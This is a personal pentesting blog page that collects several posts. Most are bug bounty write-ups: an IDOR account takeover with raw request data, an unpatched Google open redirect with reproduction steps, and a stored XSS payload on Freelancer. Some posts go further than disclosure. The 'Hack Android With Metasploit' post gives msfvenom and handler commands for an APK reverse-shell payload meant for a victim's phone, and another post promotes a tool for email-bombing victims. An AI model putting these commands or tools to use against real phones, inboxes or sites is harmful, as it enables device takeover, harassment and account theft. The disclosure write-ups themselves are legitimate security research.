ABOUT ME

My First Strategy is committed to providing you the best service.

MY SKILLS

I pride myself with strong, flexible and top notch skills.

Pentesting

Xss 85%
Broken Authentications 80%
Server-Side Vulnerabilities 70%

Web Developing

PHP 90%
HTML 85%
Css/Javascript 80%

Web Designing

Freindly User Interface 90%
SEO 80%
Responsive Page Design 85%

STRATEGY & CREATIVITY

I work With Full Attention So that i Suceeded in My Every JOB.

Pentesting Blog

I pride MySelf on bringing fresh Exploits and effective Vulnrabilities.

  • Account TakeOver Using IDOR (ZeroCopter)



    Hello Buddies,
                            Hope You Guys Are doing.I am really a noobish Guy named Abdulwahab Khan.In That Article i want to share a PoC Of one of My Findings in Private Programs At ZeroCopter.
    So without Wasting Time Lets Move Forward Towards The Actual PoC.While Testing the Program i dont find any Thing On their Main Website Expect of 2 3 Low Impact Bugs Which i dont Reported Because i knows They are Going to be Duplicate.So I again Looked in to The Bounty Brief And See an Secondry Website So just Started testing It too.After Completing Account Registration i just went to the Account Details for Test of XSS and CSRF Types Attack.Unfortunately they Are Using Good WAF Protection for XSS then i Tried for CSRF attack.The Request Looks Like


    CustomerAccount.CustomerId=4884c354-5c06-4014-8cdb-978aa7d4fd08&CustomerAccount.FirstName=Abdulwahab&CustomerAccount.LastName=Khan&CustomerAccount.Email=hackertabish786%40bugcrowdninja.com&CustomerAccount.Phone=&profileBirthDate=&myAccountSubscribe=on&profileSignUpDailyDeals=on&__RequestVerificationToken=XdRptyf0jaMfI0VqnRHh7b0g-qo7M420BfdrssU8gNf_md6n4_himhPVpUDn3hYjMmqrqq3cWqE5Znlv7oMRwPtrve5tZ80baAZvzg4Y1NCYCvZqyHc_9nJBcSQt3XTK_rbQ1itYopth1T6eM6H7Cg2
    Now there 2 Things That are Seems To be Interesting  CustomerAccount.CustomerId and _RequestVerificationToken
    Now I Tried Removing _RequestVerificationToken and Forwarded the Request And It Changed my Profile Settings without validiating Verification Token.

    I was Like:

    After that i Quickly Created a New Account with another Email address and Captured its Request of changing profile Removed _RequestVerificationToken and Changed it customerId to my old Account and forwarded the request.

    Response is :
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: application/json; charset=utf-8
    Request-Context: appId=cid-v1:6179475f-85be-4c05-84ee-87e58617700f
    X-Frame-Options: DENY
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Date: Fri, 19 july 2019 10:01:31 GMT
    Connection: close
    Content-Length: 32

    "Your profile has been updated."
    Now its time to test that is it really updated on my account and my profile is updated.
    That Moment i was:
    After Few Moments of happiness i realized how can an attacker exploit it if he dont knows the Victim CustomerID. Then I Started Finding CustomerID by testing API's and JSON Files but Failed Then i was like :

    Then i logged out My account but saw a Unsubscribe Button i just Cliked it and it is only asking For Email i said ok Lets Check it when i entered email and Clicked UnSubscribe me from Updates a pop up appeared asking for password I See on BurpSuite and there is the Customer ID
    Now i have a Full Scenario of Account takeover by knowing Email of victim.
    Using following Steps
    1. Get CustomerID by Unsub Button
    2. Change email using IDOR
    3. Request a new Password on New Email
    4. BOOOM!
    ZeroCopter TimeLine :
    • Reported 19 July 2019
    • Accepeted By ZeroCopter Team 19 july 2019
    • working in Progress 22 july 2019
    • Asked for retest 26 July 2019
    • Marked as Resolved 26 July 2019
    • Recieved Bounty in my btc wallet 27 July 2019

    Regards,
    Abdulwahab Khan
    Independent Cyber Security Researcher.
  • 5 Tools For Bug Huting and Penetration Testing


    Aslam-o-Alaikum, This is a While I am Writing a Article I Got Many Messages on Facebook and on My WhatsApp Number That Which tools i use for pentesting?/What are the Best Tools Hacking? etc.So i decided to post an Article of 10 Tools That i use.

    5.Knock(Subdomian-Finder).

    Knockpy is an automated SubDomain Enumeration Tools Which is currently maintained by Gianni 'guelfoweb' Amato.This Tool Helps to Find SubDomians of a Domain.It is also designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Now knockpy supports queries to VirusTotal subdomains, you can setting the API_KEY within the config.json file.

    4.Nmap

    Nmap is an abbreviation for ‘Network Mapper.’ It is an open source, free application used for network scanning. It makes use of IP packets for auditing the network. Nmap offers a multitude of options to scan a single IP, port, or host to a range of IPs, ports, and hosts. It can also be used to scan a subnet, identify the services that are running on hosts, determine the OS versions in which the remote hosts are running, and discover vulnerabilities and security holes. It is a very powerful tool. The output and information can serve as a precursor to penetration testing efforts. 

    3.Nikto

    Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
    Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).
    Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

     2.BurpSuite

    The Most inportant thing in bug hunting and Penetration Testing is BurpSuite.BurpSuite is one of the Famous tool used by almost every Researcher.It also helps user in Site Scan From Vulnerabilities.One primary use of the Burp Suite is to intercept all requests and responses between the browser and the target application. The free version is also useful for generating a proof-of-concept cross-site request forgery (CSRF) attack for a given request. There’s also the application-aware crawler that can be used to map out application contents. A paid version unlocks even more features.

    1.Uniscan

    I am Taking This Tool to Number 1 Because i use this tool the most.This tool helps User to Fetch all Dirs and Files of Webserver and Test Them From Following Vulnerabilities:-
    • RCE
    • LFI
    • XSS
    • SQLI
    • Backup Files
    • Config Files and Many More
  • Hack Android With Metasploit


    Hello Guys! Hacker Wahab Here.This Post is about something Enjoying.In this Post i am Going to Show you How we can Hack any Android Phone with the Help of Metasploit So Lets Start,

    In this Hack Tutorial we Use Metasploit so You must have access to Following Things
    • MSFVENOM
    • MSFCONSOLE

    So Move Forward With Creating APK PayLoad by Following Command

    msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip address] LPORT=[Any Port] -o [APK NAME]


    Now We have to Start the postgresql Service by:-

    service postgresql start

    Now We have to Listen on Payload ( APK File) We Created From MSFCONSOLE

    By Following Commands:-
    • msfconsole
    • use exploit/multi/handler
    • set payload android/meterpreter/reverse_tcp
    • set LHOST [your Ip Address]
    • set LPORT[your Port]
    •  exploit
     And Its Done here..

    Now you have to run apk file we created in Victim Phone then you got access to his phone.

    Watch Video Demo For Better Learning:-


    Thanks for Reading.Ping me if u Face any Problem.

    My Facebook:-

    facebook.com/hackerwahab.on

    Abdulwahab,
    Independent Cyber Security Researcher,
  • Google Authenticated Open Redirect




    Hello Guys!

    While Testing Google Security.I found Authenticated Open Redirect Vulnerability as Google Not Accept Open Redirects so It was not accepted so i decided to share this Unpatched Bug With You.

    Description:-

     https://appengine.google.com/ is a Website That Redirect the App Login to User Website which is Created on

    https://console.cloud.google.com/projectselector/appengine?src=ac&pli=1 This Website Redirect Form Through https://appengine.google.com/_ah/conflogin?continue=http://www.hackerwahab.com 

    Via Google Account Login.So if We Change www.hackerwahab.com to Any Malicious website open Redirect Works.



    Steps to reproduce:
    1.go to
    https://accounts.google.com/
    ServiceLogin/signinchooser?continue=https://appengine.google.com/_ah/conflogin?continue=http://www.hackerwahab.com/members&service=ah&ltmpl=gm&flowName=GlifWebSignIn&flowEntry=ServiceLogin
    2.Change www.hackerwahab.com with any malicious Site.
    3.Login With Google account Open Redirect Works

    Browser/OS: All

    Attack Scenario:-

    The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.


    Video PoC:-

  • HW-Bomber Python based Email Bombing tool


    Hello Guys,

    Hacker Wahab here.Today i am Going to Show You My First Ever Python Developed Pentesting Tool named " HW-Bomber" is a Email Bombing Tool Which integrate with Gmail & Yahoo Server To flood Victim Email.

    Download Here:-

     https://github.com/hackerwahab/Hw-Bomber 

    Watch Tutorial:-


    Note:-

    For Gmail Account You Must Enable "Less Secure App" From here:-
    https://myaccount.google.com/lesssecureapps

  • What is SPF Records & Their Impact?


    Hello Guys, Hacker Wahab Here today i am going to show an Old Bug Which Only a Few Pentesters Know.Many of The Pentester's and Hacker only See DNS records for a website for Sub_Domain TakeOver and Skip SPF Records Testing.

    What is SPF/TXT Records?

    An SPF record is a type of Domain Name Service (DNS) record that identifies which mail servers are permitted to send email on behalf of your domain. The purpose of an SPF record is to prevent spammers from sending messages with forged From addresses at your domain.

    Checking Missing SPF:-

     There Are Various Ways of Checking Missing SPF Records on a website But the Most Common and Popular way is kitterman.com

    Steps to Check SPF Records on a website:-
    1. Go to Kitterman.com/spf/validiate.html
    2. Enter Target Website Ex: target.com (Do Not Add https/http or www)
    3. Hit Check SPF (IF ANY)

      If You seem any SPF Record than Domain is Not Vulnerable But if you see Nothing Here then "HURRAY! You Found a Bug"

     

    Attack Scenario & PoC:-

    Once There is No SPF Records.An Attacker Can Spoof Email Via any Fake Mailer Like Emkei.cz.An Attacker Can Send Email From name "Support" and Email: "support@target.com" With Social Engineering Attack He Can TakeOver User Account Let Victim Knows the Phishing Attack but When He See The Email from the Authorized Domain.He Got tricked Easily.

    Similar HackerOne Reports:-

    https://hackerone.com/reports/54779 Reward : 500$
    https://hackerone.com/reports/120 Reward: 500$

    Bonus Tip:-

    Before Reporting Issue Check the Email headers if it is "SOFTFAIL" or "FAIL" It is Not a Bug Reporting may Cause N/A.Report Only if the Header is Neutral

     Thanks for Reading

    Regards,
    ABDULWAHAB. 
  • Stored Xss in Freelancer

    Hello Guys.Hope You are Doing Well Today i am Just Disclosing my Recent Finding on Bugcrowd.I just Founded Stored Xss Vulnerability in Main Domain of Freelancer i.e,
    http://www.freelancer.com/

    I Just Reported it and Got Nice Freelancer Swag and Some Kudos I am Also expecting  Reward From Them But AnyWay.


    So, Lets Move on Towards the PoC of My Submission

    POC:-

    1. Login
    2. Go to the Profile and Click Edit
    3. in Bio Section add the Simple Xss Payload i.e,
    4.    "><script>alert(1);</script>
    5. Click Save
    6. Open Profile in New Tab
    7. XSS ! BOOM 

     Watch Video PoC:- 




    Report Summary:-

    Submission created
    2017-03-30 13:31:50 UTC

    State changed
    2017-03-31 06:29:04 UTC
    Freelancer Engineer changed state to resolved

    Freelancer Engineer Rewarded You With Swag 

    Thanks,
    Abdulwahab
  • Powered by Blogger.

    CONTACT ME

    For enquiries you can contact M in several different ways. Contact details are below.

    ABDULWAHAB

    • Meet-Up :Lahore,Pakistan
    • Phone :+92 3164970878
    • Country :PAKISTAN
    • Email :hackertabish786@gmail.com